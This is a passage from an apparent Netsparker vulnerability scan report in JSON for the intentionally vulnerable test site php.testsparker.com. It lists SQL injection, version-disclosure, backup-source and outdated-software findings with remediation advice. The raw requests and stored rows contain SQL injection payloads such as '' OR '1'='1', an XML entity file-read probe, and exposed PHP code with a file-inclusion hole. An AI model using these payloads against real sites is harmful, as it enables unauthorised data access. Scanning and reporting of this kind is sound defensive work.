    108 WARREN NOLTE 2012-03-13 12:14:54 22
    109 SYLVESTER DERN 2012-03-13 12:14:54 22
    110 SUSAN DAVIS 2012-03-13 12:14:54 22
    111 CAMERON ZELLWEGER 2012-03-13 12:14:54 22
    112 RUSSELL BACALL 2012-03-13 12:14:54 22
    113 MORGAN HOPKINS 2012-03-13 12:14:54 22
    114 MORGAN MCDORMAND 2012-03-13 12:14:54 22
    115 HARRISON BALE 2012-03-13 12:14:54 22
    116 DAN STREEP 2012-03-13 12:14:54 22
    117 RENEE TRACY 2012-03-13 12:14:54 22
    118 CUBA ALLEN 2012-03-13 12:14:54 22
    119 WARREN JACKMAN 2012-03-13 12:14:54 22
    120 PENELOPE MONROE 2012-03-13 12:14:54 22
    121 LIZA BERGMAN 2012-03-13 12:14:54 22
    122 SALMA NOLTE 2012-03-13 12:14:54 22
    123 JULIANNE DENCH 2012-03-13 12:14:54 22
    124 SCARLETT BENING 2012-03-13 12:14:54 22
    125 ALBERT NOLTE 2012-03-13 12:14:54 22
    126 FRANCES TOMEI 2012-03-13 12:14:54 22
    127 KEVIN GARLAND 2012-03-13 12:14:54 22
    128 CATE MCQUEEN 2012-03-13 12:14:54 22
    129 DARYL CRAWFORD 2012-03-13 12:14:54 22
    130 GRETA KEITEL 2012-03-13 12:14:54 22
    131 JANE JACKMAN 2012-03-13 12:14:54 22
    132 ADAM HOPPER 2012-03-13 12:14:54 22
    133 RICHARD PENN 2012-03-13 12:14:54 22
    134 GENE HOPKINS 2012-03-13 12:14:54 22
    135 RITA REYNOLDS 2012-03-13 12:14:54 22
    136 ED MANSFIELD 2012-03-13 12:14:54 22
    137 MORGAN WILLIAMS 2012-03-13 12:14:54 22
    138 LUCILLE DEE 2012-03-13 12:14:54 22
    139 EWAN GOODING 2012-03-13 12:14:54 22
    140 WHOOPI HURT 2012-03-13 12:14:54 22
    141 CATE HARRIS 2012-03-13 12:14:54 22
    142 JADA RYDER 2012-03-13 12:14:54 22
    143 RIVER DEAN 2012-03-13 12:14:54 22
    144 ANGELA WITHERSPOON 2012-03-13 12:14:54 22
    145 KIM ALLEN 2012-03-13 12:14:54 22
    146 ALBERT JOHANSSON 2012-03-13 12:14:54 22
    147 FAY WINSLET 2012-03-13 12:14:54 22
    148 EMILY DEE 2012-03-13 12:14:54 22
    149 RUSSELL TEMPLE 2012-03-13 12:14:54 22
    150 JAYNE NOLTE 2012-03-13 12:14:54 22
    151 GEOFFREY HESTON 2012-03-13 12:14:54 22
    152 BEN HARRIS 2012-03-13 12:14:54 22
    153 MINNIE KILMER 2012-03-13 12:14:54 22
    154 MERYL GIBSON 2012-03-13 12:14:54 22
    155 IAN TANDY 2012-03-13 12:14:54 22
    156 FAY WOOD 2012-03-13 12:14:54 22
    157 GRETA MALDEN 2012-03-13 12:14:54 22
    158 VIVIEN BASINGER 2012-03-13 12:14:54 22
    159 LAURA BRODY 2012-03-13 12:14:54 22
    160 CHRIS DEPP 2012-03-13 12:14:54 22
    161 HARVEY HOPE 2012-03-13 12:14:54 22
    162 OPRAH KILMER 2012-03-13 12:14:54 22
    163 CHRISTOPHER WEST 2012-03-13 12:14:54 22
    164 HUMPHREY WILLIS 2012-03-13 12:14:54 22
    165 AL GARLAND 2012-03-13 12:14:54 22
    166 NICK DEGENERES 2012-03-13 12:14:54 22
    167 LAURENCE BULLOCK 2012-03-13 12:14:54 22
    168 WILL WILSON 2012-03-13 12:14:54 22
    169 KENNETH HOFFMAN 2012-03-13 12:14:54 22
    170 MENA HOPPER 2012-03-13 12:14:54 22
    171 OLYMPIA PFEIFFER 2012-03-13 12:14:54 22
    172 GROUCHO WILLIAMS 2012-03-13 12:14:54 22
    173 ALAN DREYFUSS 2012-03-13 12:14:54 22
    174 MICHAEL BENING 2012-03-13 12:14:54 22
    175 WILLIAM HACKMAN 2012-03-13 12:14:54 22
    176 JON CHASE 2012-03-13 12:14:54 22
    177 GENE MCKELLEN 2012-03-13 12:14:54 22
    178 LISA MONROE 2012-03-13 12:14:54 22
    179 ED GUINESS 2012-03-13 12:14:54 22
    180 JEFF SILVERSTONE 2012-03-13 12:14:54 22
    181 MATTHEW CARREY 2012-03-13 12:14:54 22
    182 DEBBIE AKROYD 2012-03-13 12:14:54 22
    183 RUSSELL CLOSE 2012-03-13 12:14:54 22
    184 HUMPHREY GARLAND 2012-03-13 12:14:54 22
    185 MICHAEL BOLGER 2012-03-13 12:14:54 22
    186 JULIA ZELLWEGER 2012-03-13 12:14:54 22
    187 RENEE BALL 2012-03-13 12:14:54 22
    188 ROCK DUKAKIS 2012-03-13 12:14:54 22
    189 CUBA BIRCH 2012-03-13 12:14:54 22
    190 AUDREY BAILEY 2012-03-13 12:14:54 22
    191 GREGORY GOODING 2012-03-13 12:14:54 22
    192 JOHN SUVARI 2012-03-13 12:14:54 22
    193 BURT TEMPLE 2012-03-13 12:14:54 22
    194 MERYL ALLEN 2012-03-13 12:14:54 22
    195 JAYNE SILVERSTONE 2012-03-13 12:14:54 22
    196 BELA WALKEN 2012-03-13 12:14:54 22
    197 REESE WEST 2012-03-13 12:14:54 22
    198 MARY KEITEL 2012-03-13 12:14:54 22
    199 JULIA FAWCETT 2012-03-13 12:14:54 22
    200 THORA TEMPLE 2012-03-13 12:14:54 22
    412 -1 OR 1=1 test 2012-03-13 12:14:54 22
    413 -1 OR 1=1 test 2012-03-13 12:14:54 22
    414 NS1NO test 2012-03-13 12:14:54 22
    415 1 AND 'NS='ss test 2012-03-13 12:14:54 22
    416 ' OR 'ns'='ns test 2012-03-13 12:14:54 22
    417 -1 OR 17-7=10 test 2012-03-13 12:14:54 22
    418 1 OR X='ss test 2012-03-13 12:14:54 22
    419 ' OR '1'='1 test 2012-03-13 12:14:54 22
    420 ' OR '1'='1 test 2012-03-13 12:14:54 22

    \n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      netsparker xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \n\n
    \n\tThis website is automatically reset at every midnight (00:00 - UTC).\n
    \n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 180.5509, + "StatusCode": 200 + }, + "LookupId": "dbd0a5a8-18d2-471a-7b37-ad490211f0f0", + "Impact": "
    Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:\n\n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 02:01 AM", + "Name": "Boolean Based SQL Injection", + "ProofOfConcept": "", + "RemedialActions": "
    \n
      \n
    1. See the remedy for solution.
    2. \n
    3. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
    4. \n
    5. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
    6. \n
    7. Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.
    8. \n
    \n
    ", + "RemedialProcedure": "
    The best way to protect your code against SQL injections is using parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
    ", + "RemedyReferences": "
    ", + "Severity": "Critical", + "State": "Revived", + "Type": "ConfirmedBooleanSqlInjection", + "Url": "http://php.testsparker.com/artist.php?id=-1%20OR%2017-7%3d10" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.18.1.3", + "Capec": "170", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "205", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "45" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise identified a version disclosure (Apache) in the target web server's HTTP response.

    \n

    This information might help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + }, + { + "Name": "Extracted Version", + "Value": "2.2.8" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "fbb65b68-873e-4fff-871d-ad48024dd60f", + "Impact": "
    An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Version Disclosure (Apache)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
    ", + "RemedyReferences": "
    ", + "Severity": "Medium", + "State": "Present", + "Type": "ApacheVersionDisclosure", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.18.1.3", + "Capec": "170", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "4.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "4.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "4.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "205", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "45" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise identified a version disclosure (PHP) in target web server's HTTP response.

    \n

    This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Page Type", + "Value": "Other" + }, + { + "Name": "Extracted Version", + "Value": "5.2.6" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "d765b64b-8f6a-4343-872d-ad48024dd723", + "Impact": "
    An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Version Disclosure (PHP)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "PhpVersionDisclosure", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 50, + "Classification": { + "Iso27001": "A.18.1.3", + "Capec": "87", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "7.5" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "7.5" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "7.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + "Cvss31": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "7.5" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "7.5" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "7.5" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + "Cwe": "530", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A7", + "OwaspProactiveControls": "", + "Pci32": "6.5.8", + "Wasc": "34" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise detected backup source code on your web server.

    <?php\nrequire("auth.php");\nini_set("display_errors","0");\n\n//global configuration area\n$globals["title"] = "Netsparker Test Web Site -  PHP";\nfunction EndsWith($FullStr, $EndStr)\n{\n    // Get the length of the end string\n    $StrLen = strlen($EndStr);\n    // Look at the end of FullStr for the substring the size of EndStr\n    $FullStrEnd = substr($FullStr, strlen($FullStr) - $StrLen);\n    // If it matches, it does end with EndStr\n    return $FullStrEnd == $EndStr;\n}\n?>\n…\n<?php include "Internals/header.php"?>\n…\n<?php include "Internals/upmenu.php"?>\n…\n<?php\n            $file = $_REQUEST["file"];\n            if(EndsWith($file,".nsp"))\n                include $_REQUEST["file"];\n        ?>\n…\n<?php include "Internals/footer.php"?>
    ", + "ExploitationSkills": "
    This is dependent on the information obtained from source code. Uncovering these forms of vulnerabilities does not require high levels of skills. However, a highly skilled attacker could leverage this form of vulnerability to obtain account information for databases or administrative panels, ultimately leading to control of the application or even the host the application resides on.
    ", + "ExternalReferences": "
    ", + "ExtraInformation": [], + "FirstSeenDate": "24/06/2021 10:07 AM", + "HttpRequest": { + "Content": "POST /process.bak HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nContent-Length: 124\r\nContent-Type: application/xml\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.bak\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n]>&lfi;", + "Method": "POST", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 834\r\nLast-Modified: Thu, 30 Jul 2020 08:09:20 GMT\r\nAccept-Ranges: bytes\r\nContent-Type: text/plain\r\nDate: Thu, 24 Jun 2021 22:55:27 GMT\r\nETag: \"1200000001ba62-342-5aba4307c6c00\"\r\n\r\n\n\n\n\n
    \n \n\t \n\t\n
    \n\n\n\t\n\n\n", + "Duration": 20.6716, + "StatusCode": 200 + }, + "LookupId": "3937a826-c79e-4b14-7696-ad5101871463", + "Impact": "
    Depending on the nature of the source code disclosed, an attacker can mount one or more of the following types of attacks:\n\n
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:55 AM", + "Name": "Backup Source Code Detected", + "ProofOfConcept": "", + "RemedialActions": "
    \n

    Remove all temporary and backup files.

    \n
    ", + "RemedialProcedure": "", + "RemedyReferences": "", + "Severity": "High", + "State": "Revived", + "Type": "BackupSourceCodeFound", + "Url": "http://php.testsparker.com/process.bak" + }, + { + "Certainty": 90, + "Classification": { + "Iso27001": "A.14.1.2", + "Capec": "310", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.3" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.1" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.1" + }, + "Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "829", + "Hipaa": "164.308(a)(1)(i)", + "Owasp": "A9", + "OwaspProactiveControls": "C1", + "Pci32": "6.2", + "Wasc": "" + }, + "Confirmed": false, + "Description": "

    Netsparker Enterprise identified you are using an out-of-date version of Apache.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "2.2.8" + }, + { + "Name": "Latest Version", + "Value": "2.4.48" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 06/18/2021 12:00:00 vulnerability database content." + }, + { + "Name": "Page Type", + "Value": "Other" + } + ], + "FirstSeenDate": "15/06/2021 01:44 PM", + "HttpRequest": { + "Content": "GET / HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Length: 136\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:09 GMT\r\n\r\n\n\n\n\n", + "Duration": 45.9707, + "StatusCode": 200 + }, + "LookupId": "0e4d0f49-8783-4b29-8718-ad48024dd57e", + "Impact": "
    Since this is an old version of the software, it may be vulnerable to attacks.
    ", + "KnownVulnerabilities": [ + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Numeric Errors Vulnerability" + }, + { + "Severity": "Low", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Low", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Configuration Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Configuration Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server DEPRECATED: Code Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Neutralization of CRLF Sequences ('CRLF Injection') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Improper Authentication Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Use After Free Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "Apache HTTP Server Uncontrolled Resource Consumption Vulnerability" + }, + { + "Severity": "High", + "Title": "Apache HTTP Server Improper Access Control Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "Apache HTTP Server Improper Input Validation Vulnerability" + } + ], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Out-of-date Version (Apache)", + "ProofOfConcept": "", + "RemedialActions": "", + "RemedialProcedure": "
    \n

    Please upgrade your installation of Apache to the latest stable version.

    \n
    ", + "RemedyReferences": "
    ", + "Severity": "Critical", + "State": "Present", + "Type": "ApacheOutOfDate", + "Url": "http://php.testsparker.com/" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.1.2", + "Capec": "310", + "Cvss": { + "BaseScore": { + "Severity": 3, + "Type": "Base", + "Value": "8.8" + }, + "EnvironmentalScore": { + "Severity": 3, + "Type": "Environmental", + "Value": "8.4" + }, + "TemporalScore": { + "Severity": 3, + "Type": "Temporal", + "Value": "8.4" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "829", + "Hipaa": "164.308(a)(1)(i)", + "Owasp": "A9", + "OwaspProactiveControls": "", + "Pci32": "6.2", + "Wasc": "" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified you are using an out-of-date version of MySQL.

    ", + "ExploitationSkills": "", + "ExternalReferences": "", + "ExtraInformation": [ + { + "Name": "Identified Version", + "Value": "5.0.51b" + }, + { + "Name": "Latest Version", + "Value": "8.0.25" + }, + { + "Name": "Vulnerability Database", + "Value": "Result is based on 06/18/2021 12:00:00 vulnerability database content." + } + ], + "FirstSeenDate": "16/06/2021 12:35 PM", + "HttpRequest": { + "Content": "GET /artist.php?id=-1%20OR%2017-7%3d10 HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php?file=Generics/index.nsp\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "id", + "Type": "Querystring", + "Value": "-1 OR 17-7=10", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nDate: Thu, 24 Jun 2021 22:51:27 GMT\r\n\r\n\n\n\n\n\n\n\nNetsparker Test Web Site - PHP\n\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t

    Artist Service

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\t\t\t\t\t

    \n \n

    Results: -1 OR 17-7=10


